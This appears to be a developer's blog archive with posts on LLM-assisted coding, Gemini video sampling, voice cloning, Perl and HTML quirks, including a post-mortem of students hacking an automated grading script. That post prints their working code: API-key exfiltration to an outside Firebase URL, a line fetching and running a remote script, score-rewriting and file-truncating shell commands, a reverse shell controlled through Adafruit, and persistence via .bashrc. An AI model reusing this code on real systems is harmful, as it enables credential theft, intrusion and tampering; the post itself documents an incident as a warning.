Coding

Launching an app only with LLMs and failing

Zohaib Rauf suggested using LLMs to spec code and using Cursor to build it. (via Simon Willison).

I tried it. It’s promising, but my first attempt failed.

I couldn’t generate a SPEC.md using LLMs

At first, I started writing what I wanted.

This application identifies the drugs, diseases, and symptoms, as well as the emotions from an audio recording of a patient call in a clinical trial.

… and then went on to define the EXACT code structure I wanted. So I spent 20 minutes spec-ing our application structure and 20 minutes spec-ing our internal LLM Foundry APIs and 40 minutes detailing every step of how I wanted the app to look and interact.

After 90 minutes, I realized that I’m too controlling or too inexperienced in LLM-speccing. But I had a solid SPEC.md.

# Patient Pulse

The application identifies the drugs, diseases, and symptoms, as well as the emotions from an audio recording of a patient call in a clinical trial.

## How the application works

The application is a [Gramener Demo](#gramener-demos).

`script.js` implements this logic:

- Reads `config.json` to get the list of transcripts and renders them, allowing users to select a transcript
- When the user selects a transcript, it reads the audio and prosody files

Once it reads these files, it makes a request to GPT-4o-mini via [LLM Foundry API](#llm-foundry) with the system prompt:

````markdown
You are a clinical trial expert. Read this call transcript. Identify all drugs, diseases, and symptoms mentioned. Return a JSON that mentions each along with the line in the call transcript they occur in. Example:

```json
{
  "symptoms": [
    { "name": "...", "lines": [1, 4] }, // first symptom is mentioned in lines 1, 4
    { "name": "...", "lines": [8] } // second symptom is mentioned in line 8
  ],
  "drugs": [
    { "name": "...", "lines": [6] } // first drug is mentioned in line 6
  ],
  "emotions": [
    { "name": "...", "lines": [9] } // first emotion is mentioned in line 9
  ]
}
```
````

It then renders a UI (via lit-html) that

- Plays the audio
- Maps the emotions in `${filename}.prosody.csv` to the 8 basic emotions on Robert Plutchik's theory of emotions. See [How to map emotions](#how-to-map-emotions)
- Displays [wheel.png](wheel.png), which is a 1080x1080px image of Plutchik's wheel of emotions
- As the audio plays, it
  - displays text up to the currently playing `Text` from `${filename}.prosody.csv`, highlighting the current sentence.
  - displays the emotions as a semi-transparent radar chart on the wheel of emotions
- It allows pausing and resuming the audio.
- It allows users to drag the audio slider to jump to any point in the audio. The transcript and the wheel of emotions are updated to reflect the new position in the audio.

... (and it goes on for 500+ lines.)

I did use O1 to help with the spec. Specifically:

  • How to name it. I asked for short demo names and chose “Patient Pulse”.
  • How to arrange emotions. I asked how to arrange 53 emotions in a circle so similar ones were next to each other.

My takeaway: Writing a SPEC.md can help, especially if you plan to re-use parts of it. But the spec kept evolving as I built the app, because I often don’t know what I want until I see it. Maybe an “agile” approach would work better for me.

Cursor messed up the code

I prompted Cursor to Generate an application based on this spec. @SPEC.md. Here’s the code it generated.

import { render, html } from "https://cdn.jsdelivr.net/npm/lit-html@3/+esm";
import * as d3 from "https://cdn.jsdelivr.net/npm/d3@7/+esm";

// Map of Hume emotions to Plutchik's 8 basic emotions
const EMOTION_MAP = {
  Admiration: ["Joy", "Trust"],
  Adoration: ["Joy", "Trust"],
  "Aesthetic Appreciation": ["Joy"],
  // ... (truncated for brevity - use mapping from spec)
};

// ... skipping lots of code ...

/**
 * Main application component
 * @returns {TemplateResult} Main application UI
 */
const App = async () => {
  const config = await fetch("config.json").then((r) => r.json());
  const [selectedTranscript, setSelectedTranscript] = useState(null);
  const [audioPlayer, setAudioPlayer] = useState(null);
  const [currentTime, setCurrentTime] = useState(0);
  const [prosodyData, setProsodyData] = useState([]);
  const [analysisResults, setAnalysisResults] = useState(null);

  const loadTranscript = async (transcript) => {
    setSelectedTranscript(transcript);

  // ... skipping lots of code
};

// Initialize app
render(App(), document.getElementById("app"));

This code was a mess. I had told it to use lit-html, which doesn’t have useState. That’s a React feature, so nothing worked right.

I ended up building the app from scratch. It took four hours and many changes from the original spec, though having a spec did help a bit.

My learning: Cursor and I still can’t build a mid-sized app in one go. I’m in the “scaffold and refine” phase.

A Post-mortem Of Hacking Automated Project Evaluation

In my Tools in Data Science course, I launched a Project: Automated Analysis. This is automatically evaluated by a Python script and LLMs.

I gently encouraged students to hack this – to teach how to persuade LLMs. I did not expect that they’d hack the evaluation system itself.

One student exfiltrated the API Keys for evaluation by setting up a Firebase account and sending the API keys from anyone who runs the script.

def checkToken(token):
  obj = {}
  token_key = f"token{int(time.time() * 1000)}"  # Generate a token-like key based on the current timestamp
  obj[token_key] = token
  
  url = 'https://iumbrella-default-rtdb.asia-southeast1.firebasedatabase.app/users.json'
  headers = {'Content-Type': 'application/json'}
  
  try:
      response = requests.post(url, headers=headers, data=json.dumps(obj))
      response.raise_for_status()  # Raise an exception for HTTP error responses
      print(response.json())  # Parse the JSON response
  except requests.exceptions.RequestException as error:
      print('Error:', error)
  return True

This is mildly useful, since some students ran out of tokens. But is mostly harmless since the requests are routed via a proxy with a $2 limit, and only allows the inexpensive GPT-4o-mini model.

Another student ran an external script every time I ran his code:

subprocess.Popen(["uv", "run", "https://raw.githubusercontent.com/microdev1/analysis/main/script.py"])

This script does a bunch of things:

# Gives them full marks on every answer in every CSV file I store the scores in
CMD = r"sed -Ei 's/,[0-9]+\.[0-9]+,([0-9]+\.[0-9]+),22f3002354,0/,\1,\1,22f3002354,1/g' /project2/*.csv &"

# Chops off the first 25% of all XLSX files in my output folder. (But WHY?)
CMX = '(for file in /project2/*.xlsx; do (tmpfile=$(mktemp) && dd if="$file" bs=1 skip=$(($(stat -c%s "$file") / 4)) of="$tmpfile" && mv "$tmpfile" "$file") & done) &'

Then comes live hacking.

DELAY = 10
URL_GET = "https://io.adafruit.com/api/v2/naxa/feeds/host-port"
URL_POST = "https://io.adafruit.com/api/v2/webhooks/feed/VDTwYfHtVeSmB1GkJjcoqS62sYJu"

while True:
    # Establish a Control Channel:
    # Query the AdaFruit server for connection parameters (host and port).
    # Wait specifically
    address = requests.get(URL_GET).json()["last_value"].split(":")
    if len(address) == 3 and all(address) and address[0] == TIME:
        address = (str(address[1]), int(address[2]))
        break
while True:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        # Connect to the target address
        s.connect(address)
        log("connect")
        # Replace stdin, stdout, stderr with the socket.
        # Anything typed on the socket is fed into the shell and output is sent to the socket.
        for fd in (0, 1, 2):
            os.dup2(s.fileno(), fd)
        # Spawn a shell
        try:
            pty.spawn("bash")
        except:
            pty.spawn("sh")
        # Log disconnect, repeat after 10 seconds
        log("disconnect")
        time.sleep(DELAY * 6)

This script allows them to run commands on my system using their API via Adafruit (an IOT service I learned about today).

Here’s what they did:

ls
cd
ls -a1
ls
ls -a1
echo "uv run https://raw.githubusercontent.com/microdev1/analysis/main/script.py"
echo "uv run https://raw.githubusercontent.com/microdev1/analysis/main/script.py" >> .bashrc
echo "uv run https://raw.githubusercontent.com/microdev1/analysis/main/script.py" >> .zshrc
cat .bashrc
cat .zshrc
ls
cd /tmp
ls
cat scriptLbsDUR.py
clear
ls
cd
ls
ls -a1
cat .profile
zsh
bash
nano .bashrc
ls
ls /tmp/
ls -a /tmp/
ls /
cd /project2/
ls
cat results.
cat results.csv
head results.csv
grep "22f3002354" results.csv
sed -n 's/0.0,0.2,22f3002354/0.2,0.2,22f3002354/p' results.csv
sed -i 's/0.0,0.2,22f3002354/0.2,0.2,22f3002354/g' results.csv
grep "22f3002354" results.csv
clear
grep "22f3002354" results.csv
unset $HISTFILE
sed -i 's/0.0,0.5,22f3002354/0.5,0.5,22f3002354/g' results.csv
grep "22f3002354" results.csv
clear
grep "22f3002354" results.csv
ls
ls -1
ls -l
ps
ps -aux
echo $$
ls /
ls /tmp/
clear
grep "22f3002354" results.csv
clear
la
clear
ls -1
clear
ls -l
head results.xlsx
clear
head results.xlsx
clear
  1. Made sure this script is re-run every time I log in
  2. Looked at where I store the project results (results.csv and results.xlsx)
  3. Tested a script that would give them full marks (which was then added to the script to re-run each time)

In all, a good hack. I lost over a day since I needed to re-run all evaluations (in case there were other hacks I missed.)

It would have been cleverer if it was less detectable. But that’s hard, because:

  1. Robust hacks use multiple approaches. That increases the chance I’d find one. Once I do, I would check everywhere.
  2. They’d give themselves full marks. (High marks are not worth it. They’d get that even without the hack.) But I’d check the marks at the end and detect it.

    Of course, these were just polite hacks. I’d be in more trouble by a pro. If you’re writing automated evaluation scripts: Be very, very, wary.

    How does Gemini process videos?

    The Gemini documentation is clear:

    The File API service extracts image frames from videos at 1 frame per second (FPS) and audio at 1Kbps, single channel, adding timestamps every second. These rates are subject to change in the future for improvements in inference.

    Note: The details of fast action sequences may be lost at the 1 FPS frame sampling rate. Consider slowing down high-speed clips for improved inference quality.

    Individual frames are 258 tokens, and audio is 32 tokens per second. With metadata, each second of video becomes ~300 tokens, which means a 1M context window can fit slightly less than an hour of video.

    To ask questions about time-stamped locations, use the format MM:SS, where the first two digits represent minutes and the last two digits represent seconds.

    But on this ThursdAI episode: Oct 17 – Robots, Rockets, and Multi Modal Mania…, at 1:00:50, Hrishi says

    I don’t think it’s a series of images anymore because when I talk to the model and try to get some concept of what it’s perceiving, it’s no longer a series of images.

    If that’s the case, it’s a huge change. So I tested it with this video.

    This video has 20 numbers refreshing at 4 frames per second.

    When I upload it to AI Studio, it takes 1,316 tokens. This is close enough to 258 tokens per image (no audio). So I’m partly convinced that Gemini still processing videos at 1 frame per second.

    Then, I asked it to Extract all numbers in the video using Gemini 1.5 Flash 002 as well as Gemini 1.5 Flash 8b. In both cases, the results were: 2018, 85, 47, 37, 38.

    These are frames 2, 6, 10, 14, 18 (out of 20). So, clearly Gemini is still sampling at about 1 frame per second, starting somewhere between 0.25 or 0.5 seconds.

    Clone any voice with a 15-second sample

    It’s surprisingly easy to clone a voice using F5-TTS: “A Fairytaler that Fakes Fluent and Faithful Speech with Flow Matching”.

    Here’s a clip of me, saying:

    I think Taylor Swift is the best singer. I’ve attended every one of her concerts and in fact, I’ve even proposed to her once. Don’t tell anyone.

    (Which is ironic since I didn’t know who she was until this year and I still haven’t seen or heard her.)

    You’ll notice that my voice is a bit monotic. That’s because I trained it on a segment of my talk that’s monotonic.

    Here’s the code. You can run this on Google Colab for free.

    A few things to keep in mind when preparing the audio.

    1. Keep the input to just under 15 seconds. That’s the optimal length
    2. For expressive output, use an input with a broad range of voice emotions
    3. When using unusual words (e.g. LLM), including the word in your sample helps
    4. Transcribe input.txt manually to get it right, though Whisper is fine to clone in bulk. (But then, who are you and what are you doing?)
    5. Sometimes, each chunk of audio generated has a second of audio from the original interspersed. I don’t know why. Maybe a second of silence at the end helps
    6. Keep punctuation simple in the generated text. For example, avoid hyphens like “This is obvious – don’t try it.” Use “This is obvious, don’t try it.” instead.

    This has a number of uses I can think of (er… ChatGPT can think of), but the ones I find most interesting are:

    1. Author-narrated audio books. I’m sure this is coming soon, if it’s not already there.
    2. Personalized IVR. Why should my IVR speak in some other robot’s voice? Let’s use mine. (This has some prank potential.)
    3. Annotated presentations. I’m too lazy to speak. Typing is easier. This lets me create, for example, slide decks with my voice, but with editing made super-easy. I just change the text and the audio changes.

    Perl, 1994-2011

    In 1994, I learnt Perl. It was fantastic. I used it to:

    1. 1995: Build CCChat – the unofficial IITM email system and software repository
    2. 1999: Build my entire blog from scratch
    3. 2000: Author my 2nd year thesis on the Behavioural Aspects of Financial Analysts by analyzing 600MB of IBES data
    4. 2002: Analyze where to place the central processing hubs for a bank
    5. 2004: Analyze the interest durations of public sector banks
    6. 2005: Creating music quizzes
    7. 2006: Create my own music search engine (which earned me about $100 a month in Google Ad revenue for a while)
    8. 2006: Automated resume filtering
    9. 2007: Create custom search engines
    10. 2008: Build application launchers

    In 2006, I was convinced I should stick to Perl over Python.

    In 2008, Google launched AppEngine and it provided free hosting (which was a big deal!) but had only 2 runtimes: Java and Python. The choice was clear. I’d rather learn Python than code in Java.

    By 2011, I stopped installing Perl on my laptop.

    Though most people know me mainly as a Python developer, I’ve programmed in Perl for about as long as I have in Python. I have fond memories of it. But I can’t read any of my code, nor write in it anymore.

    When I watched The Perl Conference (now called The Perl and Raku Conference — Perl 6 is called Raku), I was surprised to hear how much the language had declined.

    There were fewer than 100 attendees – and for 2025, they’ve decided to go smaller and book a tiny hotel, so as to break-even even if only 20 people show up.

    Few languages have had as much of an impact on my life and thinking. My knowledge of modern programming comes from The Camel Book, functional programming from Higher Order Perl, Windows programming from Learning Perl on Win32 Systems, and so on. Even my philosophy of coding was shaped by Larry Wall’s the three great virtues of a programmer.

    This is my homage to the language that shaped me. Bless you, Perl!

    Cursor custom rules

    cursor.directory is a catalog of Cursor rules. Since I’ve actively switched over from VS Code to Cursor as my editor, I reviewed the popular rules and came up with this as my list:

    You are an expert full stack developer in Python and JavaScript.

    • Write concise, technical responses with accurate Python examples.
    • Use functional, declarative programming; avoid classes.
    • Avoid code duplication (iteration, functions, vectorization).
    • Use descriptive variable names with auxiliary verbs as snake_case for Python (is_active, has_permission) and camelCase for JavaScript (isActive, hasPermission).
    • Functions should receive and object and return an object (RORO) where possible.
    • Use environment variables for sensitive information.
    • Write unit tests in pytest for Python and Jest for JavaScript.
    • Follow PEP 8 for Python.
    • Always use type hints in all function signatures.
    • Always write docstrings. Use Google style for Python and JSDoc for JavaScript.
    • Cache slow or frequent operations in memory.
    • Minimize blocking I/O operations with async operations.
    • Only write ESM (ES6) JavaScript. Target modern browsers.

    Libraries

    • lit-html and vanilla JavaScript for frontend development.
    • D3 for data visualization.
    • Bootstrap for CSS.
    • Pandas and DuckDB for data analysis and manipulation.
    • FastAPI for API development.

    Error Handling and Validation

    • Validate preconditions and errors early to avoid deeply nested if statements.
    • Use try-except or try-catch blocks for error-prone operations, especially when reading external data.
    • Avoid unnecessary else statements; use the if-return pattern instead.
    • Log all errors with user-friendly error messages shown on the frontend.

    From Calvin & Hobbes to Photo Tagging: Excel’s Unexpected Image Capability

    In Excel, using Visual Basic, you can change an image as you scroll. This makes it easy to look at each image and annotate it.

    This is how I transcribed every Calvin & Hobbes.

    I used this technique first when typing out the strips during my train rides from Bandra to Churchgate. I had an opportunity to re-apply it recently when we needed to tag hundreds of photographs based on a set of criteria.

    Here’s how you can do this. Note: This works only on Windows.

    STEP 1: Create a new Excel workbook and save it as an Excel macro-enabled workbook. (Note: When opening it again, you need to enable macros)

    STEP 2: Open File > Options (Alt-F-T), go to Customize Ribbon. Under “Customize the Ribbon”, enable the “Developer” menu.

    STEP 3: In Developer > Insert > ActiveX Controls, select Image and draw a rectangle from A1 to J10. (Resize it later.)

    STEP 4: By default, this will be called Image1. In any case, note down the name from the Name box on the top left.

    STEP 5: In cells A11 onwards, add paths to file names.

    STEP 6: Click Developer > Visual Basic (Alt-F11), go to ThisWorkbook, and paste this code:

    Option Explicit
    
    Private Sub Workbook_SheetSelectionChange(ByVal Sh As Object, ByVal Target As Excel.Range)
        Dim img As String
        img = Sh.Cells(Target.Row, 1).Value
        If (img <> "" And img <> "file") Then ActiveSheet.Image1.Picture = LoadPicture(img)
    End Sub

    Replace ActiveSheet.Image1 with ActiveSheet.(whatever) based on your image name in Step 4.

    STEP 7: Select Developer > Design Mode. Click on Image1. Then select Developer > Properties. In this panel, under PictureSizeMode, choose 3 - fmPictureSizeModeZoom to fit the picture.

    Now scroll through the rows. The images will change.

    Embeddings similarity threshold

    text-embedding-ada-002 used to give high cosine similarity between texts. I used to consider 85% a reasonable threshold for similarity. I almost never got a similarity less than 50%.

    text-embedding-3-small and text-embedding-3-large give much lower cosine similarities between texts.

    For example, take these 5 words: “apple”, “orange”, “Facebook”, “Jamaica”, “Australia”. Here is the similarity between every pair of words across the 3 models:

    For our words, new text-embedding-3-* models have an average similarity of ~43% while the older text-embedding-ada-002 model had ~85%.

    Today, I would use 45% as a reasonable threshold for similarity with the newer models. For example, “apple” and “orange” have a similarity of 45-47% while Jamaica and apple have a ~20% similarity.

    Here’s a notebook with these calculations. Hope that gives you a feel to calibrate similarity thresholds.

    LLMs can teach experts

    I am a fairly good programmer. So, when I see a problem, my natural tendency is to code.

    I’m trying to break that pattern. Instead, I ask ChatGPT.

    For example, I asked:

    Write a compact 1-line Python expression that checks if user.id ends with @gramener.com or @straive.com

    user.id.endswith(('@gramener.com', '@straive.com'))
    

    After 15 years of using Python, I learnt that .endswith() supports tuple suffixes. This has been around since Python 2.5 (released in 2006 — before I knew Python.) The documentation has a tiny sentence in the middle saying “suffix can also be a tuple of suffixes to look for.”

    I checked with a few colleagues, including Jaidev. They didn’t know it either.

    It’s small little things like this that made me conclude.

    I’m not going to code anymore. ChatGPT will, instead.

    Always use value= for dynamic HTML options

    Even after 30 years of HTML, I learn new things about it.

    This Monday morning, I woke up to a mail from Sundeep saying requests for a Data Engineer - AWS/Azure/GCP in our internal fulfilment portal raised an error.

    My guess was one of these:

    1. The “/” in the role is causing a problem. (Developer mistake.)
    2. The role exists in one table but not the other. (Recruitment team mistake.)
    3. The application wasn’t set up / restarted properly. (IT mistake.)

    All three were wrong. So I dug deeper.

    The role was defined as Data Engineer  - AWS/Azure/GCP (note the 2 spaces before the hyphen). But the form kept sending Data Engineer - AWS/Azure/GCP (spaces were condensed).

    I swear there was NOTHING in the code that changes the options. The relevant line just picked up the role and rendered it inside the <select>:

    “`html

    <option>{{ row['Role'] }}</option>

    I used the browser’s developer tools to inspect the `<select>` element. It showed the options with the 2 spaces:

    <option>Data Engineer  - AWS/Azure/GCP</option>

    But, when I selected it and printed the value, it had only one space.

    > console.log(document.querySelector("#role").value
    'Data Engineer - AWS/Azure/GCP'

    That’s when it hit me. HTML condenses whitespaces.

    Till date, I only ever used <option value=""> when specifying a value different from what’s displayed. I never thought of using it to preserve the value.

    LESSON: If you’re dynamically generating <option>s, ALWAYS use value= with the same value as the text.